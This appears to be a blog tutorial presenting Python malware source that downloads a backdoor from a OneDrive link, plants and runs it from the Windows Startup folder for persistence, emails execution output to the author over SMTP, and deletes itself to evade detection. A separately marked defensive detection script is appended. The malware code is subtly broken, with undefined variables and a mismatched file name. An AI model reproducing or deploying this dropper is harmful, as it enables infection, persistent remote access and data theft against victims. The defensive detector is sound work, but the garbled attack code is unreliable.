A Python Malware That Will Destroy Itself After Execution.

Mohd Amaan Siddiqui
3 min read, Apr 20, 2021

Malware is a piece of code intended to damage, disrupt or steal information from the victim's computer.

Python is an interpreted, object-oriented, high-level language that is very handy for attackers while performing an attack. The reason is the vast library support that comes with Python: almost anything you can think of, someone has already built it in Python. This gives malware authors a huge advantage, since simple capabilities can be cherry-picked from the open web and more complex capabilities rarely need to be written from scratch. That is the short intro to why malware authors use Python for malware development, but we are here to discuss a live application forged in Python, so let's dive directly into the raw Python code.

[+] The Requirements Of Writing This Malware Are:

1-Install Python 2.7 Or Higher.

2-Install Pycharm Community Edition.

3-Offensive Mindset.

Let's Start Typing Some Code

import requests, subprocess, smtplib, os, time

Why does the malware author need to import these modules? The “requests module” lets the malware fetch a response from the malicious link, and that link can point to anything: a Backdoor, Keylogger, Credential Harvester, etc. The “subprocess module” executes commands on the victim's computer, so that the malware author can run the malware that has been downloaded there. The “smtplib module” sends the execution response from the victim's computer back to the malware author's computer. The “os module” interacts with the victim's computer, and “time” is used to leave a gap between two executed commands so the malware does not crash or malfunction during execution.

def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as outfile:
        outfile.write(get_response.content)

So here the malware author creates a function that fetches the response from the malicious link, splits the URL on “/” into a list, uses the last element as the file name, and then writes all of the binary content into that file.

def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

The reason for creating this function is to send the execution output by email from the victim's computer to the malware author's computer.

def command_execution():
    os.chdir("C:\Windows\Start Menu\Programs\Startup")
    command1 = "cd C:\Windows\Start Menu\Programs\Startup"
    command2 = "Malware.exe"
    data1 = subprocess.check_output(command1, shell=True)
    data2 = subprocess.check_output(command2, shell=True)

download("https://1drv.ms/u/Backdoor.exe")
send_mail(email="YourEmailAddress_Here", password="YourPass_Here",message=data1)
command_execution()
os.remove(file_name)

We can see a function named command_execution, which means it will interact with the victim's computer. In the first line inside the function the malware author changes to the directory where the malware downloaded from the link is going to land, which is the startup directory of the victim's computer. Why did he choose the startup directory? Because whenever the victim boots the device, the malware will automatically execute itself, and so the malware author gains persistence on the victim's machine. In the next lines we command the victim's command-line console, capture its output and save it in a variable; later the data stored in that variable is sent to the malware author as confirmation that the malware worked and the victim is infected. At the end you can see the “os.remove” call, which is the key feature of this malware: after executing and giving the reverse connection back to the malware author, it removes itself, so there is less chance of getting caught.
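Seen from the defensive side, the four behaviours this script chains (a script host writing a file into the Startup folder, that file being launched, an outbound SMTP connection, and the dropped file being deleted) are also what makes it easy to spot in endpoint telemetry. The following is an added example, not code from the post: it correlates constructed Sysmon-style events per process and alerts when a single process shows three or more of those behaviours. The event field names, process ids and sample paths are assumptions made for the example.

```python
import re
from collections import defaultdict

# Matches a file inside a per-user or all-users Startup folder and captures its name.
STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup\\([^\\]+)$", re.IGNORECASE)
MAIL_PORTS = {25, 465, 587}

def detect(events):
    """Group Sysmon-style events (1 = ProcessCreate, 3 = NetworkConnect,
    11 = FileCreate, 23 = FileDelete) by the acting process id and record which
    of the dropper behaviours each process showed. Returns {pid: set(signals)}."""
    signals = defaultdict(set)
    for ev in events:
        pid, kind = ev["pid"], ev["id"]
        if kind == 11 and STARTUP.search(ev.get("target", "")):
            signals[pid].add("wrote file into Startup folder")
        elif kind == 1 and STARTUP.search(ev.get("image", "")):
            signals[ev["ppid"]].add("launched a file from Startup folder")  # credit the parent
        elif kind == 3 and ev.get("dst_port") in MAIL_PORTS:
            signals[pid].add("opened an SMTP connection")
        elif kind == 23 and STARTUP.search(ev.get("target", "")):
            signals[pid].add("deleted a file from Startup folder")
    return dict(signals)

def alerts(events, threshold=3):
    """A mail client talking SMTP or an installer adding a Startup entry is one
    signal each; only a process with `threshold` or more distinct signals is alerted."""
    return {pid: sorted(s) for pid, s in detect(events).items() if len(s) >= threshold}

# Constructed sample telemetry (not from the post): pid 4242 is a python.exe dropper,
# pid 900 is a mail client and pid 77 an installer that legitimately adds a Startup entry.
START = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
EVENTS = [
    {"id": 11, "pid": 4242, "image": "python.exe", "target": START + r"\Backdoor.exe"},
    {"id": 1, "pid": 5001, "ppid": 4242, "image": START + r"\Backdoor.exe"},
    {"id": 3, "pid": 4242, "image": "python.exe", "dst_ip": "203.0.113.10", "dst_port": 587},
    {"id": 23, "pid": 4242, "image": "python.exe", "target": START + r"\Backdoor.exe"},
    {"id": 3, "pid": 900, "image": "outlook.exe", "dst_ip": "203.0.113.20", "dst_port": 587},
    {"id": 11, "pid": 77, "image": "setup.exe", "target": START + r"\Updater.lnk"},
]

if __name__ == "__main__":
    for pid, found in alerts(EVENTS).items():
        print(f"ALERT pid {pid}: " + "; ".join(found))
```

Only pid 4242 crosses the threshold; the mail client and the installer each produce a single signal and stay quiet.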

Thanks For Reading…!!

You can find me on:

LinkedIn:-https://www.linkedin.com/in/amaansid/

Twitter- https://twitter.com/TronicFlux

Company(LinkedIn)-https://www.linkedin.com/company/acubesecurity/
